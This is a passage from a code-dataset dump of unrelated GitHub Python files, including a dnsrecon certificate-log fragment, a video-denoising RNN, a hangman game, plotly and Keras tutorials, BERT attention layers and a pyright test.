sub_dom.startswith(\"*.\"):\n print_status(f\"\\t {sub_dom} wildcard\")\n continue\n if sub_dom not in results:\n results.append(sub_dom)\n\n return results\n","repo_name":"darkoperator/dnsrecon","sub_path":"dnsrecon/lib/crtenum.py","file_name":"crtenum.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":2365,"dataset":"github-code","pt":"48"} +{"seq_id":"23739947956","text":"from models.components import ResBlocks, D\nfrom pytorch_pwc.extract_flow import extract_flow_torch\nfrom pytorch_pwc.pwc import PWCNet\nimport torch\nimport torch.nn as nn\nfrom utils.warp import warp\n\nclass ForwardRNN(nn.Module):\n def __init__(self, img_channels=3, num_resblocks=6, num_channels=64):\n super(ForwardRNN, self).__init__()\n self.num_channels = num_channels\n self.pwcnet = PWCNet()\n self.forward_rnn = ResBlocks(input_channels=img_channels + img_channels + num_channels, num_resblocks=num_resblocks, num_channels=num_channels)\n self.d = D(in_channels=num_channels, mid_channels=num_channels, out_channels=img_channels)\n\n def trainable_parameters(self):\n return [{'params':self.forward_rnn.parameters()}, {'params':self.d.parameters()}]\n\n def forward(self, seqn, noise_level_map):\n N, T, C, H, W = seqn.shape\n seqdn = torch.empty_like(seqn)\n\n init_h = torch.zeros((N, self.num_channels, H, W), device=seqn.device)\n h = self.forward_rnn(torch.cat((seqn[:, 0], noise_level_map[:, 0], init_h), dim=1))\n seqdn[:, 0] = self.d(h)\n\n for i in range(1, T):\n flow = extract_flow_torch(self.pwcnet, seqn[:, i], seqn[:, i-1])\n aligned_h, _ = warp(h, flow)\n h = self.forward_rnn(torch.cat((seqn[:, i], noise_level_map[:, i], aligned_h), dim=1))\n seqdn[:, i] = self.d(h)\n\n return 
seqdn\n","repo_name":"nagejacob/FloRNN","sub_path":"models/forwardrnn.py","file_name":"forwardrnn.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"5218880854","text":"import pygame\n\npygame.init()\n\nWIDTH, HEIGHT=1600, 1200\nWIN=pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Hangman(French Revolution Edition)\")\nFPS=60\n\nYELLOW=(255,255,0)\nBLUE=(0,255,0)\nBLACK=(0,0,0)\nfont = pygame.font.SysFont(\"arial\", 50)\n\nbuttons=[]\nhang_pic=[pygame.image.load(\"Pictures/1.png\"),pygame.image.load(\"Pictures/2.png\"),pygame.image.load(\"Pictures/3.png\"),\n pygame.image.load(\"Pictures/4.png\"),pygame.image.load(\"Pictures/5.png\"),pygame.image.load(\"Pictures/6.png\"),\n pygame.image.load(\"Pictures/7.png\")]\n\nword=\"Hello\"\nhang=0\nguessed=[]\n\ndef check(guess):\n if(guess.upper() in word.upper()):\n return True\n return False\n\ndef getButton(x,y):\n global buttons\n for button in buttons:\n if x>=button[1]-50 and x<=button[1]+50:\n if y>=button[2]-50 and y<=button[2]+50:\n if button[4]:\n return button[5]\n return None\n\ndef get_output():\n global word\n output=''\n for i in word:\n found=False\n for j in guessed:\n if i.upper()==j.upper():\n output+=i+' '\n found=True\n if not found:\n output+='_ '\n return output\n\n\ndef draw_window():\n WIN.fill(YELLOW)\n for button in buttons:\n if button[4]:\n pygame.draw.circle(WIN,BLUE,(button[1],button[2]),button[3])\n letter = font.render(chr(button[5]), 1, BLACK)\n WIN.blit(letter,(button[1]-letter.get_width()//2,button[2]-letter.get_height()//2))\n WIN.blit(hang_pic[hang],(450,300))\n output=font.render(get_output(),1, BLACK)\n output_width=output.get_width()\n WIN.blit(output,((WIDTH//2-output_width//2),900))\n pygame.display.update()\n\ndef end(win=False):\n #pygame.time.delay(2000)\n if win==True:\n text=\"You win!\"\n else:\n text=\"You lose!\"\n WIN.fill(YELLOW)\n win_text=font.render(text,1,BLACK)\n WIN.blit(win_text, (WIDTH//2-win_text.get_width()//2,HEIGHT//2))\n pygame.display.update()\n pygame.time.delay(1000)\n pygame.quit()\n\ndef main():\n global hang\n run=True\n clock=pygame.time.Clock()\n for i in range(26):\n x=1500//13*(i%13+1)\n y=100+i//13*110\n buttons.append([BLUE,x,y,50,True,65+i])\n while run:\n clock.tick(FPS)\n draw_window()\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n run=False\n if event.type==pygame.KEYDOWN:\n if event.key==pygame.K_ESCAPE:\n run=False\n if event.type==pygame.MOUSEBUTTONDOWN:\n x,y=event.pos\n if getButton(x,y)!=None:\n i=getButton(x,y)\n letter=chr(i)\n i-=65\n guessed.append(letter)\n buttons[i][4] = False\n if check(letter):\n if get_output().count('_')==0:\n end(True)\n else:\n if hang!=5:\n hang+=1\n else:\n end()\n\n pygame.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xiangnongWu2233/LHPS_CodingClub_GroupProject_Python","sub_path":"Mini_Game(Demo created by Xiangnong)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12433544394","text":"\n\nainfo = []\nLeftBit = 16\nfor i in range(2, 15):\n\tsubnum = (2 ** i) - 2\n\tpcs = 2 ** (32 - (i + LeftBit)) - 2\n\tb = '1' * LeftBit + '1' * i + '0' * (32-(i+LeftBit))\n\tx = tuple(map(lambda x: int(x, 2), (b[0:8], b[8:16],b[16:24],b[24:32])))\n\tmask = \"%s.%s.%s.%s\" % x\n\tainfo.append((i,subnum,mask,pcs))\t\n\nfor row in 
ainfo:\n\tprint(\"\")\n\tfor item in row:\n\t\tprint(\"%s\" % item)\n\tprint(\"\")\n","repo_name":"dehuagit/mypython","sub_path":"ip/Bclass.py","file_name":"Bclass.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"39704928341","text":"\"\"\"Utilities for keeping track of time in a task.\"\"\"\n\nfrom __future__ import division\nfrom PyQt5 import QtCore\nfrom axopy.messaging import Transmitter, TransmitterBase\n\n\nclass Counter(TransmitterBase):\n    \"\"\"Counts to a given number then transmits a timeout event.\n\n    Parameters\n    ----------\n    max_count : int\n        Number of iterations to go through before transmitting the `timeout`\n        event. Must be at least 1.\n    reset_on_timeout : bool, optional\n        Specifies whether or not the timer should reset its count back to zero\n        once the timeout event occurs. The default behavior is to reset.\n\n    Attributes\n    ----------\n    count : int\n        Current count.\n    timeout : Transmitter\n        Transmitted when ``max_count`` has been reached.\n\n    Examples\n    --------\n    Basic usage:\n\n    >>> from axopy.timing import Counter\n    >>> timer = Counter(2)\n    >>> timer.increment()\n    >>> timer.count\n    1\n    >>> timer.progress\n    0.5\n    >>> timer.increment()\n    >>> timer.count\n    0\n    \"\"\"\n\n    timeout = Transmitter()\n\n    def __init__(self, max_count=1, reset_on_timeout=True):\n        super(Counter, self).__init__()\n        max_count = int(max_count)\n        if max_count < 1:\n            raise ValueError('max_count must be >= 1')\n\n        self.reset_on_timeout = reset_on_timeout\n\n        self.max_count = max_count\n        self.count = 0\n\n    @property\n    def progress(self):\n        \"\"\"Progress toward timeout, from 0 to 1.\"\"\"\n        return self.count / self.max_count\n\n    def increment(self):\n        \"\"\"Increment the counter.\n\n        If `max_count` is reached, the ``timeout`` event is transmitted. If\n        `reset_on_timeout` has been set to True (default), the timer is also\n        reset.\n        \"\"\"\n        self.count += 1\n\n        if self.count == self.max_count:\n            if self.reset_on_timeout:\n                self.reset()\n\n            self.timeout.emit()\n\n    def reset(self):\n        \"\"\"Resets the count to 0 to start over.\"\"\"\n        self.count = 0\n\n\nclass Timer(TransmitterBase):\n    \"\"\"Real-time one-shot timer.\n\n    This is useful in situations where you want to wait for some amount of time\n    and locking the timing to data acquisition updates is not important. 
For\n example, inserting a waiting period between trials of a task can be done by\n connecting the ``timeout`` transmitter to your task's\n :meth:`~axopy.task.Task.next_trial` method.\n\n Parameters\n ----------\n duration : float\n Duration of the timer, in seconds.\n\n Attributes\n ----------\n timeout : Transmitter\n Transmitted when the timer has finished.\n \"\"\"\n\n timeout = Transmitter()\n\n def __init__(self, duration):\n super(Timer, self).__init__()\n self.duration = duration\n\n self._qtimer = QtCore.QTimer()\n self._qtimer.setInterval(int(1000*self.duration))\n self._qtimer.setSingleShot(True)\n self._qtimer.timeout.connect(self.timeout)\n\n def start(self):\n \"\"\"Start the timer.\"\"\"\n self._qtimer.start()\n\n def stop(self):\n \"\"\"Stop the timer.\n\n If you stop the timer early, the timeout event won't be transmitted.\n \"\"\"\n self._qtimer.stop()\n","repo_name":"axopy/axopy","sub_path":"axopy/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"2988470191","text":"# %% [markdown]\n\"\"\"\nThis is a notebook to compare high and low eccentric cells to see if there are notable differences via UMAP representation\n\"\"\"\n# %%\nimport sys\nsys.path.append('../scripts')\nimport pickle\nimport cellMorphHelper\nimport cellMorph\nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport umap\nimport pandas as pd\nimport seaborn as sns\nimport random\n\nfrom skimage.measure import label, regionprops, regionprops_table\n# %%\nesamNeg = pickle.load(open('../results/TJ2201Split16/TJ2201Split16-E2.pickle',\"rb\"))\nesamPos = pickle.load(open('../results/TJ2201Split16/TJ2201Split16-D2.pickle',\"rb\"))\n\nesamNeg = cellMorphHelper.filterCells(esamNeg, confluencyDate=datetime.datetime(2022, 4, 8, 16, 0), color='red', edge=True)\nesamPos = cellMorphHelper.filterCells(esamPos, confluencyDate=datetime.datetime(2022, 4, 8, 16, 0), color='green', edge=True)\n\nesamNegOrig = esamNeg.copy()\nesamPosOrig = esamPos.copy()\n# %%\ncells = esamNeg+esamPos\nlowEcc, highEcc = [], []\nlowEccThresh, highEccThresh = 0.4, 0.9\nfor cell in cells:\n region = regionprops(cell.mask.astype(np.uint8))\n if len(region)>1:\n region = sorted(region, key = lambda allprops: allprops.area)\n region = region[0]\n if region.eccentricity <= lowEccThresh:\n lowEcc.append(cell)\n elif region.eccentricity >= highEccThresh:\n highEcc.append(cell)\n# %%\nscalingBool = 0\nreferencePerim = highEcc[0].perimInt\nc = 1\n\nfor cell in lowEcc:\n currentPerim = cell.perimInt\n \n refPerim2, currentPerim2, disparity = cellMorphHelper.procrustes(referencePerim, currentPerim, scaling=scalingBool)\n\n cell.perimAligned = currentPerim2 - np.mean(currentPerim2, axis=0)\n\nfor cell in highEcc:\n currentPerim = cell.perimInt\n \n refPerim2, currentPerim2, disparity = cellMorphHelper.procrustes(referencePerim, currentPerim, scaling=scalingBool)\n\n cell.perimAligned = currentPerim2 - np.mean(currentPerim2, axis=0)\n# %%\nrandom.seed(1234)\nrandom.shuffle(lowEcc)\ncells = lowEcc+highEcc[0:len(lowEcc)]\nnCells = len(lowEcc)\nlabels = ['low' for i in range(nCells)]+['high' for i in range(nCells)]\n\nX = []\nfor cell in cells:\n X.append(cell.perimAligned.ravel())\nX = np.array(X)\n# %%\nfit = umap.UMAP()\nu = fit.fit_transform(X)\n# %%\nfontSize = 20\nfig, ax = plt.subplots()\nfig.set_size_inches(6, 6)\n\nlabel2Color = {'low': 'red', 'high': 
'blue'}\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\n\nfor label in np.unique(labels):\n    labelIdx = np.where(np.array(labels)==label)\n    ux = u[labelIdx,0]\n    uy = u[labelIdx,1]\n    ax.scatter(ux, uy, s=5, c=label2Color[label], alpha=0.5, label=label)\n\nax.set_xlabel('UMAP 1')\nax.set_ylabel('UMAP 2')\nax.set_title(f'ESAM Perimeter Morphology Eccentricity > {highEccThresh:0.2f}')\nax.title.set_size(fontSize)\nax.xaxis.label.set_size(fontSize)\nax.yaxis.label.set_size(fontSize)\nax.legend(markerscale=4)\nax.xaxis.set_ticklabels([])\nax.yaxis.set_ticklabels([])\nax.set_yticks([])\nax.set_xticks([])","repo_name":"TylerJost/cellMorph","sub_path":"notebooks/old/highLowEccentricity.py","file_name":"highLowEccentricity.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"19943026324","text":"# Basic Plotly Charts\n\n# Get Started with Different Chart types in Plotly\n\n# Import required libraries\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n# 1. Scatter Plot:\n\n# A scatter plot shows the relationship between 2 variables on the x and y-axis. \n# The data points here appear scattered when plotted on a two-dimensional plane. \n# Using scatter plots, we can create exciting visualizations to express various relationships, such as:\n# - Height vs weight of persons\n# - Engine size vs automobile price\n# - Exercise time vs Body Fat\n\n##Example 1: Let us illustrate the income vs age of people in a scatter plot\n\nage_array=np.random.randint(25,55,60)\n# Define an array containing income values (60 values, matching age_array)\nincome_array=np.random.randint(300000,700000,60)\n\n##First we will create an empty figure using go.Figure()\nfig=go.Figure()\n\n#Data type check\nprint(type(fig))\n\n#Next we will create a scatter plot by using the add_trace function and use the go.Scatter() function within it\n# In go.Scatter we define the x-axis data,y-axis data and define the mode as markers with color of the marker as blue\nfig.add_trace(go.Scatter(x=age_array, y=income_array, mode='markers', marker=dict(color='blue')))\n\n# However in the previous output title, x-axis and y-axis labels are missing. Let us use the update_layout function to update the title and labels.\n\n## Here we update these values under function attributes such as title,xaxis_title and yaxis_title\nfig.update_layout(title='Economic Survey', xaxis_title='Age', yaxis_title='Income')\n# Display the figure\nfig.show()\n\n# Inferences:\n# From the above plot we find that the Income of a person is not correlated with age. We find that as the age increases the income may or may not increase.\n
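# Optional variant (a minimal sketch): the same chart can be drawn in a single\n# plotly express call instead of graph_objects:\nfig = px.scatter(x=age_array, y=income_array, title='Economic Survey',\n                 labels={'x': 'Age', 'y': 'Income'})\nfig.show()\n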
\n# 2. Line Plot:\n# A line plot shows information that changes continuously with time. Here the data points are connected by straight lines. \n# Line plots are also plotted on a two dimensional plane like scatter plots. Using line plots, we can create exciting visualizations to illustrate:\n# - Annual revenue growth\n# - Stock Market analysis over time\n# - Product Sales over time\n\n\n##Example 2: Let us illustrate the sales of bicycles from Jan to August last year using a line chart\n# Define an array containing numberofbicyclessold \nnumberofbicyclessold_array=[50,100,40,150,160,70,60,45]\n# Define an array containing months\nmonths_array=[\"Jan\",\"Feb\",\"Mar\",\"April\",\"May\",\"June\",\"July\",\"August\"]\n\n##First we will create an empty figure using go.Figure()\nfig=go.Figure()\n#Next we will create a line plot by using the add_trace function and use the go.Scatter() function within it\n# In go.Scatter we define the x-axis data,y-axis data and define the mode as lines with color of the marker as green\nfig.add_trace(go.Scatter(x=months_array, y=numberofbicyclessold_array, mode='lines', marker=dict(color='green')))\n## Here we update these values under function attributes such as title,xaxis_title and yaxis_title\nfig.update_layout(title='Bicycle Sales', xaxis_title='Months', yaxis_title='Number of Bicycles Sold')\n# Display the figure\nfig.show()\n\n# Inferences: From the above plot we find that sales are highest in the month of May and then there is a decline in sales.\n# We will now use the plotly express library to plot the other graphs\n\n# 3.Bar Plot:\n# A bar plot represents categorical data in rectangular bars. Each category is defined on one axis, and the value counts for this category are represented on another axis. \n# Bar charts are generally used to compare values. We can use bar plots in visualizing:\n# - Pizza delivery time in peak and non peak hours\n# - Population comparison by gender\n# - Number of views by movie name\n\n##Example 3: Let us illustrate the average pass percentage of classes from grade 6 to grade 10\n\n# Define an array containing scores of students \nscore_array=[80,90,56,88,95]\n# Define an array containing Grade names \ngrade_array=['Grade 6','Grade 7','Grade 8','Grade 9','Grade 10']\n\n# In plotly express we set the axis values and the title within the same function call \n# px.<chart_type>(x=<x data>, y=<y data>, title=<chart title>).\n# In the below code we use px.bar( x=grade_array, y=score_array, title='Pass Percentage of Classes').\n\n\n# Use plotly express bar chart function px.bar. Provide input data, x and y axis variable, and title of the chart.\n# This will give average pass percentage per class\nfig = px.bar( x=grade_array, y=score_array, title='Pass Percentage of Classes') \nfig.show()\n\n# From the above plot we find that Grade 8 has the lowest pass percentage and Grade 10 has the highest pass percentage\n
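# Optional variant (a minimal sketch): px.bar also accepts a 'labels' mapping to\n# rename the default axis titles when plotting raw arrays:\nfig = px.bar(x=grade_array, y=score_array, title='Pass Percentage of Classes',\n             labels={'x': 'Grade', 'y': 'Pass percentage'})\nfig.show()\n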
\n# 4.Histogram:\n# A histogram is used to represent continuous data in the form of bars. \n# Each bar has discrete values in bar graphs, whereas in histograms, we have bars representing a range of values. \n# Histograms show frequency distributions. We can use histograms to visualize:\n# - Students marks distribution\n# - Frequency of waiting time of customers in a Bank\n\n\n##Example 4: Let us illustrate the distribution of heights of 200 people using a histogram\n\nimport numpy as np\n# Here we draw 200 samples with a mean height of 160 cm and a standard deviation of 11\nheights_array = np.random.normal(160, 11, 200)\n## Use plotly express histogram chart function px.histogram. Provide input data x to the histogram\nfig = px.histogram(x=heights_array,title=\"Distribution of Heights\")\nfig.show()\n\n# From this we can analyze that there are around 2 people who are at the height of 130cm and 45 people at the height of 160 cm\n\n# 5. Bubble Plot:\n# A bubble plot is used to show the relationship between 3 or more variables. It is an extension of a scatter plot. Bubble plots are ideal for visualizing:\n# - Global Economic position of Industries\n# - Impact of viruses on Diseases\n\n##Example 5: Let us illustrate crime statistics of US cities with a bubble chart\n\n#Create a dictionary having city,numberofcrimes and year as 3 keys\ncrime_details = {\n    'City' : ['Chicago', 'Chicago', 'Austin', 'Austin','Seattle','Seattle'],\n    'Numberofcrimes' : [1000, 1200, 400, 700,350,1500],\n    'Year' : ['2007', '2008', '2007', '2008','2007','2008'],\n}\n \n# create a Dataframe object with the dictionary\ndf = pd.DataFrame(crime_details)\n \ndf\n\n## Group the number of crimes by city and find the total number of crimes per city\nbub_data = df.groupby('City')['Numberofcrimes'].sum().reset_index()\n\n##Display the grouped dataframe\nbub_data\n\n## Bubble chart using px.scatter function with x, y and size variables defined. Title defined as Crime Statistics\nfig = px.scatter(bub_data, x=\"City\", y=\"Numberofcrimes\", size=\"Numberofcrimes\",\n                 hover_name=\"City\", title='Crime Statistics', size_max=60)\nfig.show()\n\n# The size of the bubble in the bubble chart indicates that Chicago has the highest crime rate when compared with the other 2 cities.\n\n# 6.Pie Plot:\n# A pie plot is a circle chart mainly used to represent the proportion of parts of given data with respect to the whole data. \n# Each slice represents a proportion, and the proportions together add up to the whole. We can use pie plots in visualizing:\n# - Sales turnover percentage with respect to different products\n# - Monthly expenditure of a Family\n\n## Monthly expenditure of a family\n# Random Data\nexp_percent= [20, 50, 10,8,12]\nhouse_holdcategories = ['Grocery', 'Rent', 'School Fees','Transport','Savings']\n\n# Use px.pie function to create the chart. Input dataset. \n# Values parameter will set values associated to the sector. 'exp_percent' feature is passed to it.\n# Labels for the sectors are passed to the `names` parameter.\nfig = px.pie(values=exp_percent, names=house_holdcategories, title='Household Expenditure')\nfig.show()\n\n# From this pie chart we can find that the family expenditure is maximum for rent.\n
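# Optional variant (a minimal sketch): setting the 'hole' argument turns the pie\n# into a donut chart:\nfig = px.pie(values=exp_percent, names=house_holdcategories,\n             title='Household Expenditure', hole=0.4)\nfig.show()\n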
\n# 7.Sunburst Charts:\n# Sunburst charts represent hierarchical data in the form of concentric circles. \n# Here the innermost circle is the root node which defines the parent, and then the outer rings move down the hierarchy from the centre. \n# They are also called radial charts. We can use them to plot:\n\n# Worldwide mobile Sales where we can drill down as follows:\n\n# - innermost circle represents total sales\n# - first outer circle represents continentwise sales\n# - second outer circle represents countrywise sales within each continent\n# - Disease outbreak hierarchy\n# - Real Estate Industrial chain\n\n##Example 6: Let us illustrate a family hierarchy with a sunburst chart\n\n#Create a dictionary having a set of people represented by a character array and the parents of these characters represented in another\n## array and the values are the values associated to the vectors.\ndata = dict(\n    character=[\"Eve\", \"Cain\", \"Seth\", \"Enos\", \"Noam\", \"Abel\", \"Awan\", \"Enoch\", \"Azura\"],\n    parent=[\"\", \"Eve\", \"Eve\", \"Seth\", \"Seth\", \"Eve\", \"Eve\", \"Awan\", \"Eve\" ],\n    value=[10, 14, 12, 10, 2, 6, 6, 4, 4])\n\nfig = px.sunburst(\n    data,\n    names='character',\n    parents='parent',\n    values='value',\n    title=\"Family chart\"\n)\nfig.show()\n\n# It is found that here the innermost circle Eve represents the parent and the second outer circle represents her children Cain, Seth and so on.\n# Further the outermost circle represents her grandchildren Enoch and Enos\n\n# Practice Exercises: Apply your Plotly Skills to an Airline Dataset\n# The Reporting Carrier On-Time Performance Dataset contains information on approximately 200 million domestic US flights reported to the United States Bureau of \n# Transportation Statistics. The dataset contains basic information about each flight (such as date, time, departure airport, arrival airport) and, if applicable, \n# the amount of time the flight was delayed and information about the reason for the delay. This dataset can be used to predict the likelihood of a flight arriving on time.\n","repo_name":"Marcin-Lewandowski/Data_Science","sub_path":"plotly_charts.py","file_name":"plotly_charts.py","file_ext":"py","file_size_in_byte":9836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"23103765497","text":"import sys\nimport cv2\n\nimg = cv2.imread('./Opencv/cat.bmp') \n\nif img is None:\n    print('Image load failed!')\n    sys.exit()\n\n    \ncv2.namedWindow('image') # wn\ncv2.imshow('image', img)\ncv2.waitKey()\n\ncv2.destroyAllWindows()\n","repo_name":"sunho-park/study1","sub_path":"OpenCV/1_opencv.py","file_name":"1_opencv.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"44465639228","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar  1 10:19:08 2020\r\n\r\n@author: Andrew\r\n\"\"\"\r\n\r\n\r\nfrom keras.datasets import mnist\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Conv2D, Flatten\r\n\r\n#Getting and separating data into train and test\r\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\r\n\r\n#Reshaping\r\nX_train = X_train.reshape(60000,28,28,1)\r\nX_test = X_test.reshape(10000,28,28,1)\r\n\r\n#Changing into categorical (vector with a 1 on it)\r\ny_train = to_categorical(y_train)\r\ny_test = to_categorical(y_test)\r\n\r\n#Building model, two convolutional layers using relu, softmax so it can make predictions on probabilities\r\nmodel = Sequential()\r\nmodel.add(Conv2D(64,kernel_size=3,activation='relu', input_shape=(28,28,1)))\r\nmodel.add(Conv2D(32, kernel_size=3, activation='relu'))\r\n
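# Note: with 3x3 kernels and no padding, the 28x28 inputs shrink to 26x26 and then\r\n# 24x24 feature maps (64 then 32 channels) before flattening.\r\n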
model.add(Flatten())\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\n#Compiling \r\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n#Fitting\r\nmodel.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3)\r\n\r\n\r\n","repo_name":"aricketts99/First-CNN-mnist-dataset","sub_path":"first_keras_cnn.py","file_name":"first_keras_cnn.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"9885293941","text":"class Data:\n    products = {}\n    representations = {}\n\n    @classmethod\n    def purge(cls):\n        cls.products = {}\n        cls.representations = {}\n\n    @classmethod\n    def load(cls, file, product_id):\n        if not file:\n            return\n        cls.products[product_id] = []\n        product = file.by_id(product_id)\n        representations = []\n        if product.is_a(\"IfcProduct\") and product.Representation:\n            representations = product.Representation.Representations\n        elif product.is_a(\"IfcTypeProduct\"):\n            representations = [rm.MappedRepresentation for rm in product.RepresentationMaps or []]\n        for representation in representations:\n            c = representation.ContextOfItems\n            rep_id = int(representation.id())\n            cls.representations[rep_id] = {\n                \"RepresentationIdentifier\": representation.RepresentationIdentifier,\n                \"RepresentationType\": representation.RepresentationType,\n                \"ContextOfItems\": {\n                    \"ContextType\": c.ContextType,\n                    \"ContextIdentifier\": c.ContextIdentifier,\n                    \"TargetView\": c.TargetView if c.is_a(\"IfcGeometricRepresentationSubContext\") else \"\",\n                },\n            }\n            cls.products[product_id].append(rep_id)\n","repo_name":"vulevukusej/BlenderBIM","sub_path":"standalone scripts for ifcopenshell/ifcopenshell/api/geometry/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"}
{"seq_id":"16933196160","text":"# -*- coding: UTF-8 -*-\r\n# !/usr/bin/python\r\n# @time     :2019/5/10 10:49\r\n# @author   :Mo\r\n# @function : 1. create a keras-bert model to get the [-2] layer outputs\r\n#             2. create an AttentionWeightedAverage layer for average attention pooling\r\n\r\nfrom keras.engine import InputSpec\r\nimport keras.backend as k_keras\r\nfrom keras.engine import Layer\r\nfrom keras import initializers\r\n\r\n\r\nclass NonMaskingLayer(Layer):\r\n    \"\"\"\r\n    fix convolutional 1D can't receive masked input, detail: https://github.com/keras-team/keras/issues/4978\r\n    thanks for https://github.com/jacoxu\r\n    \"\"\"\r\n\r\n    def __init__(self, **kwargs):\r\n        self.supports_masking = True\r\n        super(NonMaskingLayer, self).__init__(**kwargs)\r\n\r\n    def build(self, input_shape):\r\n        pass\r\n\r\n    def compute_mask(self, input, input_mask=None):\r\n        # do not pass the mask to the next layers\r\n        return None\r\n\r\n    def call(self, x, mask=None):\r\n        return x\r\n\r\n    def compute_output_shape(self, input_shape):\r\n        return input_shape\r\n\r\n\r\nclass AttentionWeightedAverage(Layer):\r\n    '''\r\n    codes from: https://github.com/BrikerMan/Kashgari\r\n    detail: https://github.com/BrikerMan/Kashgari/blob/master/kashgari/tasks/classification/models.py\r\n    Computes a weighted average of the different channels across timesteps.\r\n    Uses 1 parameter per 
channel to compute the attention value for a single timestep.\r\n '''\r\n\r\n def __init__(self, return_attention=False, **kwargs):\r\n self.init = initializers.get('uniform')\r\n self.supports_masking = True\r\n self.return_attention = return_attention\r\n super(AttentionWeightedAverage, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n self.input_spec = [InputSpec(ndim=3)]\r\n assert len(input_shape) == 3\r\n\r\n self.W = self.add_weight(shape=(input_shape[2], 1),\r\n name='{}_w'.format(self.name),\r\n initializer=self.init)\r\n self.trainable_weights = [self.W]\r\n super(AttentionWeightedAverage, self).build(input_shape)\r\n\r\n def call(self, x, mask=None):\r\n # computes a probability distribution over the timesteps\r\n # uses 'max trick' for numerical stability\r\n # reshape is done to avoid issue with Tensorflow\r\n # and 1-dimensional weights\r\n logits = k_keras.dot(x, self.W)\r\n x_shape = k_keras.shape(x)\r\n logits = k_keras.reshape(logits, (x_shape[0], x_shape[1]))\r\n ai = k_keras.exp(logits - k_keras.max(logits, axis=-1, keepdims=True))\r\n\r\n # masked timesteps have zero weight\r\n if mask is not None:\r\n mask = k_keras.cast(mask, k_keras.floatx())\r\n ai = ai * mask\r\n att_weights = ai / (k_keras.sum(ai, axis=1, keepdims=True) + k_keras.epsilon())\r\n weighted_input = x * k_keras.expand_dims(att_weights)\r\n result = k_keras.sum(weighted_input, axis=1)\r\n if self.return_attention:\r\n return [result, att_weights]\r\n return result\r\n\r\n def get_output_shape_for(self, input_shape):\r\n return self.compute_output_shape(input_shape)\r\n\r\n def compute_output_shape(self, input_shape):\r\n output_len = input_shape[2]\r\n if self.return_attention:\r\n return [(input_shape[0], output_len), (input_shape[0], input_shape[1])]\r\n return (input_shape[0], output_len)\r\n\r\n def compute_mask(self, input, input_mask=None):\r\n if isinstance(input_mask, list):\r\n return [None] * len(input_mask)\r\n else:\r\n return None\r\n","repo_name":"yongzhuo/nlp_xiaojiang","sub_path":"ClassificationText/bert/keras_bert_layer.py","file_name":"keras_bert_layer.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":1494,"dataset":"github-code","pt":"48"} +{"seq_id":"35627493735","text":"# This sample tests the handling of fields within a dataclass that\n# are descriptors.\n\nfrom dataclasses import dataclass\n\nfrom typing import overload, Any, TypeVar, Generic, Optional, Union, Callable, Type\nfrom typing_extensions import dataclass_transform\n\n\n_T = TypeVar(\"_T\")\n\n\nclass A(Generic[_T]):\n ...\n\n\nclass Desc(Generic[_T]):\n @overload\n def __get__(self, instance: None, owner: Any) -> A[_T]:\n ...\n\n @overload\n def __get__(self, instance: object, owner: Any) -> _T:\n ...\n\n def __get__(self, instance: Optional[object], owner: Any) -> Union[A[_T], _T]:\n ...\n\n\n@dataclass_transform(field_specifiers=(Desc[Any],))\ndef dataclass_like(\n *,\n init: bool = True,\n repr: bool = True, # noqa: A002\n eq: bool = True,\n order: bool = False,\n unsafe_hash: bool = False,\n) -> Callable[[Type[_T]], Type[_T]]:\n ...\n\n\n@dataclass_like()\nclass B:\n x: Desc[int]\n y: Desc[str]\n z: Desc[str] = Desc()\n\n\n@dataclass\nclass C:\n x: Desc[int]\n y: Desc[str]\n z: Desc[str] = Desc()\n\n\nreveal_type(B.x, expected_text=\"A[int]\")\nreveal_type(B.y, expected_text=\"A[str]\")\nreveal_type(B.z, expected_text=\"A[str]\")\nreveal_type(C.x, expected_text=\"A[int]\")\nreveal_type(C.y, expected_text=\"A[str]\")\nreveal_type(C.z, 
